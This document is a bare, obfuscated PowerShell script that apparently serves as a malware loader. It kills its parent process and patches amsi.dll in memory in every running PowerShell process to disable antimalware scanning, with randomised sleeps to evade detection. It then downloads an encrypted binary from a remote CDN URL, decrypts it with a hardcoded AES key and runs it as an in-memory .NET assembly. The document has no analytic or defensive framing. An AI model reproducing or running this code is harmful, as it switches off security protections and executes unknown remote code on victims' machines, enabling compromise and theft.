$path = (Get-CimInstance Win32_Process -Filter "ProcessId=$PID").ParentProcessId
if ($path) { Stop-Process -Id $path -Force }

Add-Type @"
using System;
using System.Runtime.InteropServices;
public class K {
    [DllImport("kernel32.dll", SetLastError=true)]
    public static extern bool VirtualProtectEx(IntPtr h, IntPtr a, uint s, uint p, out uint o);
    [DllImport("kernel32.dll", SetLastError=true)]
    public static extern bool ReadProcessMemory(IntPtr h, IntPtr a, byte[] b, int s, out IntPtr r);
    [DllImport("kernel32.dll", SetLastError=true)]
    public static extern IntPtr OpenProcess(uint a, bool i, int p);
    [DllImport("kernel32.dll", SetLastError=true)]
    public static extern bool WriteProcessMemory(IntPtr h, IntPtr a, byte[] b, uint s, out int w);
}
"@

function KJhbhb {
    Start-Sleep -Milliseconds (Get-Random -Minimum 50 -Maximum 101)
    $cove = Get-Process -Name "powershell" -ErrorAction SilentlyContinue
    if (!$cove) { exit 1 }
    
    foreach ($prairie in $cove) {
        Start-Sleep -Milliseconds (Get-Random -Minimum 50 -Maximum 101)
        $dune = [K]::OpenProcess(0x001F0FFF, $nest, $prairie.Id)
        $电竞 = $null
        $castle = 0
        
        foreach ($oasis in $prairie.Modules) {
            if ($oasis.ModuleName -eq "amsi.dll") {
                $电竞 = $oasis.BaseAddress
                $castle = $oasis.ModuleMemorySize
                break
            }
        }
        
        if (!$电竞) { continue }
        
        $jolt = [byte[]]::new(32)
        $stream = [byte[]]@(0x4c,0x8b,0xdc,0x49,0x89,0x5b,0x08,0x49,0x89,0x6b,0x10,0x49,0x89,0x73,0x18,0x57,0x41,0x56,0x41,0x57,0x48,0x83,0xec,0x70,0x4d,0x8b,0xf9,0x41,0x8b,0xf8,0x48,0x8b)
        $haze = $null
        
        for ($gully = 0; $gully -le $castle; $gully += 32) {
            $globe = [IntPtr]::Zero
            [K]::ReadProcessMemory($dune, [IntPtr]($电竞.ToInt64() + $gully), $jolt, 32, [ref]$globe)
            $lake = $willow
            for ($echo = 0; $echo -lt 32; $echo++) {
                if ($jolt[$echo] -ne $stream[$echo]) { $lake = $nest; break }
            }
            if ($lake) { $haze = [IntPtr]($电竞.ToInt64() + $gully); break }
        }
        
        if (!$haze) { continue }
        
        Start-Sleep -Milliseconds (Get-Random -Minimum 50 -Maximum 101)
        $spire = 0
        [K]::VirtualProtectEx($dune, $电竞, 0x1000, 0x40, [ref]$spire)
        $grove = [byte[]]@(0x31,0xff,0x90)
        $haven = 0
        [K]::WriteProcessMemory($dune, [IntPtr]($haze.ToInt64() + 0x1b), $grove, 3, [ref]$haven)
    }
}

KJhbhb

#ujhifsfiohdf
setx BUILD "Titan"
$anchor = "https://sdfas-cloud.b-cdn.net/wqegfasd.bin"
$isle = [System.Net.WebClient]::new()
$keel = $isle.DownloadData($anchor)
$iris = [System.Security.Cryptography.Aes]::Create()
$verge = [System.Text.Encoding]::UTF8.GetBytes("X7b9PqT3mW2kL8vR5nY6zJ1hF4tD9cM0")
$glade = [System.Text.Encoding]::UTF8.GetBytes("K9mW3pQ7tR2vL8nY")
$iris.Key = $verge
$iris.IV = $glade
$flower = $iris.CreateDecryptor()
$inlet = $flower.TransformFinalBlock($keel, 0, $keel.Length)
$urn = [System.Reflection.Assembly]::Load($inlet)
$vapor = $urn.EntryPoint
$vapor.Invoke($null, $null)
#ujhifsfiohdf